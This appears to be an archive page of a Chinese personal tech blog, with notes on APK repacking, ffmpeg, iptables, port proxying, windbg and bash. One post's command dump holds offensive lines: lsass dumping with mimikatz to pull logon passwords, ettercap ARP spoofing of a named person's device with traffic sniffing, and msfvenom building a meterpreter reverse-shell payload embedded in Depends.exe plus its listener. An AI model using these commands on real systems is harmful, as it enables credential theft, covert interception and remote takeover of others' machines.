技术 – Page 23

apk解包并二次封装

March 5, 2019 by euhat

解包，从网上下载apktool.jar后执行
1
java -jar apktool.jar d eye_debug.apk
java -jar apktool.jar d eye_debug.apk
替换eye_debug文件夹的文件。
封包
1
java -jar apktool.jar b eye_debug -o eye_nosign.apk
java -jar apktool.jar b eye_debug -o eye_nosign.apk

签名

del eye_signed.apk
 
set PATH=%PATH%;C:\Program Files\Java\jdk1.8.0_65\bin
 
rem keytool -genkey -keystore bm.keystore -alias bm -keyalg RSA -validity 10000
 
jarsigner -verbose -keystore bm.keystore -signedjar eye_signed.apk eye_nosign.apk bm

ffmpeg命令收集

January 30, 2022January 31, 2019 by euhat

转码
ffmpeg.exe -i %1 -vcodec h264 -s 1920x1080 -g 10 output.avi

转格式
ffmpeg.exe -i %1 -vcodec copy output.avi

改码率
ffmpeg -i in.avi -b 512K out.mp4

改文件大小
ffmpeg -i input.avi -fs 10MB output.mp4

看GOP
ffprobe.exe -show_frames 62_g10.avi | grep key_frame > 62_g10_k.txt
ffprobe.exe -show_frames 62_g10.avi | grep pict_type > 62_g10.txt
ffprobe.exe -show_frames -of xml sample.mp4 > probe.xml

只允许67访问
iptables -I INPUT -p tcp --dport 22 -j DROP; iptables -I INPUT -s 192.168.1.67 -p tcp --dport 22 -j ACCEPT
iptables-save

ssh与redis
https://www.toutiao.com/a6649866429325640205/

深度强化学习
https://github.com/keon/deep-q-learning
https://www.toutiao.com/a6664790347987550733/

MFC子窗口和父窗口
https://www.cnblogs.com/BeyondTechnology/archive/2011/03/25/1995934.html

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
https://www.toutiao.com/a6674094119448478220/

基于文件过滤驱动的透明加密那点事儿
https://blog.csdn.net/orbit/article/details/9907335

#include <mcheck.h>
void mtrace(void);
void muntrace(void);
MALLOC_TRACE=out.log ./a.out
LD_DEBUG=help ./a.out
mtrace a.out out.log

https://blog.csdn.net/tsvico/article/details/79248788
echo 1 > /proc/sys/net/ipv4/ip_forward
zenmap
ettercap -G
女神的IP设置为目标1，路由器的IP设置为目标2
driftnet -i wlan0
urlsnarf -i wlan0
ufw disable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b '\x00' -x Depends.exe -f exe -o MyDepends2.exe
msfconsole
use exploits/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.69
run
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.37 lport=4444 -f exe -o shell_stageless.exe

bat脚本获取当前文件所在目录
https://blog.csdn.net/tsvico/article/details/78050884

windbg
SRV*c:\temp*http://msdl.microsoft.com/download/symbols
!analyze -v
.load wow64exts
!sw
!heap –x 00ca3480
ub 0118188e L20
~2 s
k
dv
x MyModule!MyClass*
dps 014cb558
dt /b this
s -d 0 L?80000000 0x00cd5740
dt 0029f8b8 impClass
s -u 10000 L8000000 "hello"
!address 0728988a
.writemem d:\dump.txt 07288600 L2000
kdbgctrl -db
kdbgctrl -e
kd -kl
.reload
dt _DRIVER_OBJECT
u nt!ZwOpenKey
!process 0 0
dt nt!_eprocess
!irpfind
!pcr

二进制编辑
vim -b datafile
:%!xxd
R
:%!xxd -r
isatap Teredo

ulimit -c unlimited
echo "/tmp/core-%e-%p" > /proc/sys/kernel/core_pattern

/verbose:lib

将视频文件变成RTSP流服务

January 25, 2019 by euhat

从http://ffbinaries.com/downloads下载ffserver到linux系统，

制作server.cfg文件如下

RTSPPort 5454
BindAddress 0.0.0.0
RTSPBindAddress 0.0.0.0
MaxHTTPConnections 2000
MaxClients 1000
MaxBandwidth 30000
CustomLog -
NoDaemon
#NoDefaults
 
<Stream test.mp4>
File "/home/sdb/work/stream/test.mp4"
Format rtp
</Stream>

命令行运行

1	./ffserver -f server.cfg

这样，任何地方，只要能连接到此linux系统，其IP地址为192.168.1.32，都可以播放

1	rtsp://192.168.1.32:5454/test.mp4

本机代理到虚拟机

January 25, 2019 by euhat

由于局域网限MAC地址，VmWare虚拟机不能直接连接物理网络，只能NAT模式，那么怎么让别人的电脑连接到本机虚拟机里的服务程序呢？

比如虚拟机里的服务程序IP为192.168.38.132，端口为5454，

本机IP为192.168.1.67，现在我们做一个代理，让别人能访问到192.168.38.132:5454。

在本机，以管理员模式运行cmd，输入

netsh
interface
portproxy
 
add v4tov4 listenaddress=192.168.1.67 listenport=5454 connectaddress=192.168.38.132 connectport=5454

记住，再禁掉本机防火墙！
此时，别人的电脑就可以访问此虚拟机里的服务程序了。

当不再需要此代理时，在本机，以管理员模式运行cmd，输入

netsh
interface
portproxy
 
delete v4tov4 listenaddress=192.168.1.67 listenport=5454

注意：微软的netsh只能转发tcp包，没有实现转发udp包。

参考：https://blog.csdn.net/mergerly/article/details/50747930

linux关闭或开启网络端口

January 23, 2019 by euhat

关闭80端口

1	iptables -A INPUT -ptcp --dport 80 -j DROP

而开启80端口要看情况，不能简单的一句

1	iptables -A INPUT -ptcp --dport 80 -j ACCEPT

因为其中的-A表示append一条规则到规则链上，之前存在一条DROP链，其后再加一条ACCEPT链，80端口还是会被禁掉。

先用如下命令看一下规则链

1	iptables -L

把DROP那一链删掉

1 2	iptables -D INPUT -ptcp --dport 80 -j ACCEPT iptables -D INPUT -ptcp --dport 80 -j DROP

如果默认是所有端口都禁用，那就在空链里加一条ACCEPT链。

最后保存

1	iptables-save

EuhatWorkTrace任务栏图标不见了

January 14, 2019 by euhat

任务栏属性－〉通知区域－〉自定义，找到Expert/Euhat Work Trace图标，行为下拉框中选择“显示图标和通知”，确定保存，这样任务栏里WorkTrace图标就又显示出来了。

还有一种情况，当explorer.exe进程重启后，Euhat Work Trace或Euhat Expert通知区域的小图标也会消失，这时，要么双击程序exe，要么退出程序再启动。

ffmpeg命令行不转码只转格式

December 20, 2018 by euhat

ffmpeg -i input.ps -c copy -f mp4 output.mp4

Windows hardlink查看

December 18, 2018 by euhat

创建:

mklink /H "hard link name" "target file"
fsutil.exe hardlink create "hard link name" "target file"

查看:

fsutil.exe hardlink list "hard link name"
fsutil.exe hardlink list "target file"

出自：http://blog.nsfocus.net/shortcuthard-linkjunction-pointsymbolic-link/

命令行可以执行nohup后却不能执行

December 17, 2018 by euhat

有一个脚本/root/kill.sh:

#!/bin/sh
while [ 1 ]; do
	sudo kill -9 `pidof java`
	sleep 10
done

在命令行执行很正确，能隔一段时间把所有的java进程都杀掉了。
但执行：

1	nohup /root/kill.sh &

现象就很奇怪了，有时候能杀掉所有java进程，有时候不干活，java进程依然存在，让人怀疑人生。
无意中打开nohup.out发现有输出：
sudo没有与之关联的会话。
于是，修改kill.sh，把kill之前的sudo去掉就正常了。

Bash读取某一行某一列

December 13, 2018 by euhat

打印第11行：
sed -n "11, 1p" /tmp/tmp.txt
或者
awk 'NR == 11 {print}' /tmp/tmp.txt

打印第3列：
awk '{print $3;}' /tmp/tmp.txt

打印总行数：
awk 'END {print NR}' /tmp/tmp.txt